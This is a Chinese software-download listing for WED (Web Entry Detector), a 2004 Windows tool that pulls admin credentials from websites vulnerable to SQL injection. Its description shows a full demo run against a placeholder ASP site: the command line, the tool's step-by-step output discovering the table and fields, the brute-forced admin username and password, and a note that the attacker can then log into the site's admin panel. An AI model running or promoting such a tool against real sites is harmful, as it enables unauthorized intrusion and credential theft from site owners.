| 软件名称: | 
 WED (WEB Entry Detector) | 
 
 
| 文件类型: | 
  | 
 
  
 | 
 
 
| 界面语言: | 
 简体中文 | 
 
 
| 软件类型: | 
 国产软件 | 
 
 
| 运行环境: | 
 WinNT/2K/Xp | 
 
 
| 授权方式: | 
 共享软件 | 
 
 
| 软件大小: | 
 60K | 
 
 
| 软件等级: | 
 ★★★★☆ | 
 
 
| 发布时间: | 
 2004-09-07 | 
 
 
| 官方网址: | 
 http://www.netxeyes.com 作者:vfocus  | 
 
 
| 演示网址: | 
   | 
 
 
| 软件说明: | 
  | 
 
 
 
WED (Web Entry Detector),针对存在SQL Injection的网站对管理帐号进行扫描。 
Demo: 对通过WIS扫描出的存在SQL Injection漏洞的网站进行后台管理帐号扫描 
 
C:\>WED.exe http://www.someaspsite.com/shownews.asp?newsid=1544 
 
Web Entry Detector, Ver 1.0 by netXeyes, 2004/08/26 
http://www.netXeyes.com, security@vip.sina.com 
 
#### Phrase 0: Check Enviroment #### 
Get Row 1, Set Sensitive 250, Max Threads is 30 
File C:\TableName.dic Opened 
File C:\UserField.dic Opened 
File C:\PassField.dic Opened 
 
#### Phrase 1: Process Argv #### 
Host:www.someaspsite.com 
Page:/shownews.asp?newsid=1544 
 
#### Phrase 2: Detect SQL Injection #### 
SQL Injection Detected. 
 
#### Phrase 3: Get Cookies #### 
Tag: 2017 
Cookie: ASPSESSIONIDSADSBTAS=BIMAMMNCLCCIFICPLNEMFKND; path=/ 
 
#### Phrase 4: Starting Get Table Name #### 
Tag: 45 
Got Table Name is "users" 
 
#### Phrase 5: Starting Get Name Field #### 
Tag: 45 
Got Name Field is "name" 
 
#### Phrase 6: Starting Get Length of Field "name" #### 
Tag: 24 
Got Length of Field "name" is: 13 
 
#### Phrase 7: Starting Get Password Field #### 
Tag: 45 
Got Password Field is "pwd" 
 
#### Phrase 8: Starting Get Length of Field "pwd" #### 
Tag: 24 
Got Length of Field "pwd" is: 9 
 
#### Phrase 9: Starting Brute Field "name" and "pwd" (Access Mode) #### 
 
name is: administrator 
pwd is: admin@bvn 
 
C:\> 
 
到这一步,就可以通过WIS扫描获得的管理页面后台登陆了。 | 
 
  | 
 
 
| 下载地址: | 
 进入下载地址列表
  | 
 
 
| 下载说明: | 
☉推荐使用网际快车下载本站软件,使用 WinRAR v3.10 以上版本解压本站软件。 
☉如果这个软件总是不能下载的请点击报告错误,谢谢合作!! 
☉下载本站资源,如果服务器暂不能下载请过一段时间重试! 
☉如果遇到什么问题,请到本站论坛去咨寻,我们将在那里提供更多 、更好的资源! 
☉本站提供的一些商业软件是供学习研究之用,如用于商业用途,请购买正版。  | 
 
  | 
 
 
 
[ 推荐] 
[ 评论(0条)] [返回顶部] [打印本页] 
[关闭窗口]    | 
 
 
|  
 | 
 
 
|   | 
 
  | 
 
  
 | 
 
        
  | 
  | 
推荐广告 | 
 
  | 
 
  | 
 
| 
		
		
 | 
 
 
 |